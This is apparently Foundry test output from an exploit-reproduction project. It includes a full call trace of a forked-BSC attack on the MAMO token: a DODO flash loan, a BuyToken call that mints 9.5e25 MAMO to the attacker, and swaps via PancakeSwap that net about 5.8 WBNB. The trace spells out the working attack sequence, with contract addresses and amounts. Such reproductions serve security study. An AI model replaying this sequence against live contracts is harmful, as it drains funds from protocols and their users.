Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.23s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2023-12/MAMO_exp.sol:22:1:
   |
22 | contract ContractTest is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2023-12/MAMO_exp.sol:73:5:
   |
73 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/MAMO_exp.sol:48:31:
   |
48 |     function DVMFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes memory data) public {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/MAMO_exp.sol:48:47:
   |
48 |     function DVMFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes memory data) public {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/MAMO_exp.sol:48:88:
   |
48 |     function DVMFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes memory data) public {
   |                                                                                        ^^^^^^^^^^^^^^^^^

Warning (2072): Unused local variable.
  --> src/test/2023-12/MAMO_exp.sol:67:9:
   |
67 |         uint256[] memory amounts =
   |         ^^^^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 569.27ms (2.78ms CPU time)

Ran 1 test for src/test/2023-12/MAMO_exp.sol:ContractTest
[PASS] testExploit() (gas: 348324)
Logs:
  [Begin] Attacker WBNB before exploit: 0.000000000000000000
  [Begin] Attacker MAMO before exploit: 0
  [End] Attacker WBNB after exploit: 5.795775424049180160
  [End] Attacker MAMO after exploit: 95000000000000000000000000

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 34083188 [3.408e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [404124] ContractTest::testExploit()
    ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker WBNB before exploit", val: 0, decimals: 18)
    ├─ [13474] 0x4341bdCEd3908A45835C67A2DbBDe2d2dAA6645D::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_uint(key: "[Begin] Attacker MAMO before exploit", val: 0)
    ├─ [355120] 0xD534fAE679f7F02364D177E9D44F1D15963c0Dd7::flashLoan(0, 19000000000000000000 [1.9e19], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x30783231)
    │   ├─ [352421] 0x409E377A7AfFB1FD3369cfc24880aD58895D1dD9::flashLoan(0, 19000000000000000000 [1.9e19], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x30783231) [delegatecall]
    │   │   ├─ [27962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 19000000000000000000 [1.9e19])
    │   │   │   ├─ emit Transfer(from: 0xD534fAE679f7F02364D177E9D44F1D15963c0Dd7, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 19000000000000000000 [1.9e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xd5f8969ffd27c2760b92bf974424a89f955f0a7f36bb3aa6601492d0590b3408: 0x0000000000000000000000000000000000000000000000097a6441ae1410c132 → 0x00000000000000000000000000000000000000000000000872b6b258a7a4c132
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000107ad8f556c6c0000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [298046] ContractTest::DVMFlashLoanCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 19000000000000000000 [1.9e19], 0x30783231)
    │   │   │   ├─ [9181] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(19000000000000000000 [1.9e19])
    │   │   │   │   ├─ [41] ContractTest::fallback{value: 19000000000000000000}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit Withdrawal(src: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 19000000000000000000 [1.9e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000107ad8f556c6c0000 → 0
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [83541] 0xa915Bb6D5C117fB95E9ac2edDaE68AAd5EdB5841::BuyToken{value: 19000000000000000000}(0x5813d7818c9d8F29A9a96B00031ef576E892DEf4)
    │   │   │   │   ├─ [33322] 0x4341bdCEd3908A45835C67A2DbBDe2d2dAA6645D::486c9662(0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000004e950851be0c2ebf0000000000000000000000000000000000000000000000000000000000000000000002)
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 95000000000000000000000000 [9.5e25])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 4: 0x00000000000000000000000000000000000000005b2b5087e36388b267800000 → 0x00000000000000000000000000000000000000005b79e590352194e126800000
    │   │   │   │   │   │   @ 0xaa709de10f6ea5294c51881bfc6e23b178191f0510c132467f273b6d9ba00d36: 0 → 0x0000000000000000000000000000000000000000004e950851be0c2ebf000000
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─ [26500] 0x4341bdCEd3908A45835C67A2DbBDe2d2dAA6645D::486c9662(0000000000000000000000005813d7818c9d8f29a9a96b00031ef576e892def400000000000000000000000000000000000000000007dbb4082c9ad1798000000000000000000000000000000000000000000000000000000000000000000001)
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x5813d7818c9d8F29A9a96B00031ef576E892DEf4, value: 9500000000000000000000000 [9.5e24])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 4: 0x00000000000000000000000000000000000000005b79e590352194e126800000 → 0x00000000000000000000000000000000000000005b81c1443d4e2fb2a0000000
    │   │   │   │   │   │   @ 0xc3a42d07a251b6136961901d971e0903eb5616e9d346be42b3a773fc3e2a0819: 0 → 0x00000000000000000000000000000000000000000007dbb4082c9ad179800000
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   ├─ [0] 0x2281DcEe8Dca1B011162401da4166a862C9Ad35f::fallback{value: 19000000000000000000}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [2893] 0x5813d7818c9d8F29A9a96B00031ef576E892DEf4::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 30503694129561858470407619 [3.05e25], 23976626623894851541714 [2.397e22], 1701763277 [1.701e9]
    │   │   │   ├─ [1021] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountOut(9500000000000000000000000 [9.5e24], 30503694129561858470407619 [3.05e25], 23976626623894851541714 [2.397e22]) [staticcall]
    │   │   │   │   └─ ← [Return] 5683062170081466106194 [5.683e21]
    │   │   │   ├─ [60688] 0x5813d7818c9d8F29A9a96B00031ef576E892DEf4::swap(0, 5683062170081466106194 [5.683e21], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [12871] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5683062170081466106194 [5.683e21])
    │   │   │   │   │   ├─ emit Transfer(from: 0x5813d7818c9d8F29A9a96B00031ef576E892DEf4, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5683062170081466106194 [5.683e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x515b71a9aea85d710295654bfc5ff98e3885ceec46668edde2580c99550dfd7b: 0x000000000000000000000000000000000000000000000513c68960d1f205dad2 → 0x0000000000000000000000000000000000000000000003dfb234ab48eba81980
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000016fe6708b439b0000 → 0x000000000000000000000000000000000000000000000135843b261449f8c152
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [11474] 0x4341bdCEd3908A45835C67A2DbBDe2d2dAA6645D::balanceOf(0x5813d7818c9d8F29A9a96B00031ef576E892DEf4) [staticcall]
    │   │   │   │   │   └─ ← [Return] 40003694129561858470407619 [4e25]
    │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x5813d7818c9d8F29A9a96B00031ef576E892DEf4) [staticcall]
    │   │   │   │   │   └─ ← [Return] 18293564453813385435520 [1.829e22]
    │   │   │   │   ├─ emit Sync(reserve0: 40003694129561858470407619 [4e25], reserve1: 18293564453813385435520 [1.829e22])
    │   │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 9500000000000000000000000 [9.5e24], amount1In: 0, amount0Out: 0, amount1Out: 5683062170081466106194 [5.683e21], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x656ed8cd000000000513c68960d1f205dad2000000193b68927c0a7bfa096dc3 → 0x656ed9cd0000000003dfb234ab48eba8198000000021171c9aa8a54d73896dc3
    │   │   │   │   │   @ 9: 0x000000000000000000000000000000000282416475e5c7240817d4c0231f86c7 → 0x00000000000000000000000000000000028274e7bfff421cc2e4936bb5c5d4c7
    │   │   │   │   │   @ 10: 0x00000000000000000000000000007778debbe5850554c04e55d33146498a810f → 0x0000000000000000000000000000777dd6f5d200950e30876280d16ad4ffc30f
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 5709572170081466106194 [5.709e21]
    │   │   │   ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 5709572170081466106194 [5.709e21])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 5709572170081466106194 [5.709e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0x000000000000000000000000000000000000000000000135843b261449f8c152
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [76471] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokens(5709572170081466106194 [5.709e21], 0, [0x55d398326f99059fF775485246999027B3197955, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1701763593 [1.701e9])
    │   │   │   │   ├─ [2893] 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 17609022825996366074530085 [1.76e25], 76689679168205659977356 [7.668e22], 1701763533 [1.701e9]
    │   │   │   │   ├─ [10834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE, 5709572170081466106194 [5.709e21])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE, value: 5709572170081466106194 [5.709e21])
    │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000135843b261449f8c152 → 0
    │   │   │   │   │   │   @ 0xba08221f8673e7bcd34c1b8c4689a983ae464d35addf83dda4fe5d5546a79b0d: 0x0000000000000000000000000000000000000000000e90db0a483a403fdac925 → 0x0000000000000000000000000000000000000000000e92108e83605489d38a77
    │   │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0x000000000000000000000000000000000000000000000135843b261449f8c152 → 0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [51855] 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE::swap(0, 24795775424049180160 [2.479e19], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   ├─ [27962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 24795775424049180160 [2.479e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 24795775424049180160 [2.479e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x65a91b743eebb93754974b0d76ae6fbcc9c7843adbbd90f71368692e5c22fe4d: 0x00000000000000000000000000000000000000000000103d5b18342614be368c → 0x00000000000000000000000000000000000000000000103c02fbe9c633ee488c
    │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000001581c4a5fe0cfee00
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 17614732398166447540636279 [1.761e25]
    │   │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 76664883392781610797196 [7.666e22]
    │   │   │   │   │   ├─ emit Sync(reserve0: 17614732398166447540636279 [1.761e25], reserve1: 76664883392781610797196 [7.666e22])
    │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 5709572170081466106194 [5.709e21], amount1In: 0, amount0Out: 0, amount1Out: 24795775424049180160 [2.479e19], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x656ed9cd00000000103d5b18342614be368c0000000e90db0a483a403fdac925 → 0x656ed9cd00000000103c02fbe9c633ee488c0000000e92108e83605489d38a77
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] [5709572170081466106194 [5.709e21], 24795775424049180160 [2.479e19]]
    │   │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0xD534fAE679f7F02364D177E9D44F1D15963c0Dd7, 19000000000000000000 [1.9e19])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xD534fAE679f7F02364D177E9D44F1D15963c0Dd7, value: 19000000000000000000 [1.9e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000001581c4a5fe0cfee00 → 0x000000000000000000000000000000000000000000000000506ebb0a7463ee00
    │   │   │   │   │   @ 0xd5f8969ffd27c2760b92bf974424a89f955f0a7f36bb3aa6601492d0590b3408: 0x00000000000000000000000000000000000000000000000872b6b258a7a4c132 → 0x0000000000000000000000000000000000000000000000097a6441ae1410c132
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 12: 0 → 1
    │   │   │   └─ ← [Stop]
    │   │   ├─ [2487] 0x67ee3Cb086F8a16f34beE3ca72FAD36F7Db929e2::balanceOf(0xD534fAE679f7F02364D177E9D44F1D15963c0Dd7) [staticcall]
    │   │   │   └─ ← [Return] 323831899377336597818996 [3.238e23]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xD534fAE679f7F02364D177E9D44F1D15963c0Dd7) [staticcall]
    │   │   │   └─ ← [Return] 174839942849600995634 [1.748e20]
    │   │   ├─ [487] 0x67ee3Cb086F8a16f34beE3ca72FAD36F7Db929e2::balanceOf(0xD534fAE679f7F02364D177E9D44F1D15963c0Dd7) [staticcall]
    │   │   │   └─ ← [Return] 323831899377336597818996 [3.238e23]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xD534fAE679f7F02364D177E9D44F1D15963c0Dd7) [staticcall]
    │   │   │   └─ ← [Return] 174839942849600995634 [1.748e20]
    │   │   ├─ emit DODOFlashLoan(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 19000000000000000000 [1.9e19])
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 5795775424049180160 [5.795e18]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker WBNB after exploit", val: 5795775424049180160 [5.795e18], decimals: 18)
    ├─ [3474] 0x4341bdCEd3908A45835C67A2DbBDe2d2dAA6645D::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 95000000000000000000000000 [9.5e25]
    ├─ emit log_named_uint(key: "[End] Attacker MAMO after exploit", val: 95000000000000000000000000 [9.5e25])
    ├─  storage changes:
    │   @ 0: 0x000000000000000000caa42f09af66a8bae3a7445a7f63dad97c11638b010001 → 0x000000000000000000caa42f09af66a8bae3a7445a7f63dad97c11638b010000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 13.04s (11.48s CPU time)

Ran 2 test suites in 14.85s (13.60s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
